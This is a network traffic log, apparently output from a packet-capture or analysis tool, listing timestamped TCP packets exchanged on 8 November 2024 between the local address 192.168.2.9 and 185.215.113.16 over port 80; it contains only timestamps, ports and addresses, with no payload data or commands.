Nov 8, 2024 15:20:54.844660044 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.844666958 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.844670057 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.844681978 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.844706059 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.844731092 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.844893932 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.844907999 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.844919920 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.844952106 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.844990969 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.845002890 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.845014095 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.845017910 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.845026970 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.845038891 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.845038891 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.845063925 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.878844976 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.878859043 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.878874063 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.878887892 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.878900051 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.878912926 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.878930092 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.879684925 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.879705906 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.879714966 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.879720926 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.879735947 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.879749060 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.879760981 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.879796028 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.879796028 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.904330969 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.904356956 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.904369116 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.904419899 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.904829979 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.904841900 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.904864073 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.904881001 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.904889107 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.904892921 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.904905081 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.904911995 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.904918909 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.904937029 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.904958010 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.904969931 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.904978991 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.904982090 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.904994011 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.905003071 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.905005932 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.905031919 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.905323029 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.905546904 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.905639887 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.924159050 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.924710989 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.924807072 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.924818993 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.924829006 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.924839020 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.924863100 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.924978018 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.924989939 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.925019026 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.962557077 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.962570906 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.962580919 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.962615967 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.962620974 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.962634087 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.962649107 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.962730885 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.962856054 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.962867975 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.962877989 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.962927103 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.962938070 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.962948084 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.962951899 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.962959051 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.962970972 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.962996960 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.962996960 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.963031054 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.963072062 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.963083029 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.963093042 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.963103056 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.963129044 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.963154078 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.963845015 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.963871002 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.963881969 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.963891029 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.963903904 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.963916063 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.963922024 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.963933945 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.963943005 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.963982105 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.963982105 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.964253902 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.964279890 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.964289904 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.964304924 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.964328051 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.964332104 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.964340925 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.964360952 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.964361906 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.964375973 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.964386940 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.964387894 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.964900970 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.964912891 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.964927912 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.966381073 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.990864038 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.997961998 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.997978926 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.997992039 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.998004913 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.998018026 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.998029947 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.998029947 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.998066902 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.998224020 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.998493910 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.998548985 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.998794079 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.998805046 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.998831034 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.998842001 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.998845100 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.998853922 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.998882055 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.023046017 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.023075104 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.023086071 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.023128986 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.023128986 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.023631096 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.023643970 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.023673058 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.023685932 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.023688078 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.023696899 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.023709059 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.023724079 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.023755074 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.023838043 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.023849964 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.023874044 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.023885012 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.023895979 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.023899078 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.023926020 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.024226904 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.024239063 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.024249077 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.024300098 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.043663979 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.043716908 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.043726921 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.043766975 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.043801069 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.043812037 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.043823957 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.043867111 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.081120014 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.081142902 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.081168890 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.081182003 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.081211090 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.081212044 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.081224918 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.081233025 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.081264973 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.081463099 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.081551075 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.081563950 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.081593990 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.081593990 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.081605911 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.081624031 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.081672907 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.081686974 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.081698895 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.081723928 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.081748009 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.081969976 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.082037926 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.082077980 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.082107067 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.082117081 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.082119942 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.082132101 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.082144976 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.082176924 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.082463026 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.082475901 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.082487106 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.082499981 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.082504988 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.082511902 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.082532883 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.082537889 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.082577944 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.082861900 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.082874060 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.082885981 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.082906961 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.082959890 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.083000898 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.083087921 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.083106041 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.083123922 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.083139896 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.083148003 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.083161116 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.083208084 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.083565950 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.083578110 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.083589077 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.083600044 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.083611012 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.083615065 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.083656073 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.116646051 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.116663933 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.116674900 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.116730928 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.116770029 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.116781950 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.116795063 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.116816998 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.116841078 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.116846085 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.117846012 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.117858887 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.117871046 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.117916107 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.117923975 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.117929935 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.117971897 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.142849922 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.142872095 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.142883062 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.142894983 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.142905951 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.142915010 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.142942905 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.142946959 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.142961979 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.142975092 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.142977953 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.142987967 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.142998934 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.143014908 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.143027067 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.143163919 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.143176079 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.143187046 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.143199921 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.143210888 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.143213987 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.143232107 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.143356085 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.143368959 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.143379927 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.143414974 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.143439054 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.165126085 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.165229082 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.165240049 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.165262938 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.165273905 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.165290117 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.165328979 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.200191021 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.200220108 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.200231075 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.200242996 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.200242996 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.200256109 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.200268030 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.200268030 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.200280905 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.200292110 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.200294971 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.200311899 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.200391054 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.200402975 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.200412989 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.200432062 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.200453043 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.200465918 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.200479031 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.200510025 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.200695038 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.200706959 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.200717926 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.200735092 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.200747967 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.200758934 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.200769901 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.200807095 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.201076031 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.201090097 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.201100111 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.201127052 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.201205969 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.201246023 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.201282978 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.201303959 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.201316118 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.201354027 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.201402903 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.201415062 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.201440096 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.201478004 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.201488972 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.201494932 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.201508045 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.201520920 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.201534986 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.201545954 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.201556921 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.201562881 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.201569080 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.201594114 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:55.201986074 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.202004910 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.202020884 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:55.202032089 CET	80	49800	185.215.113.16	192.168.2.9
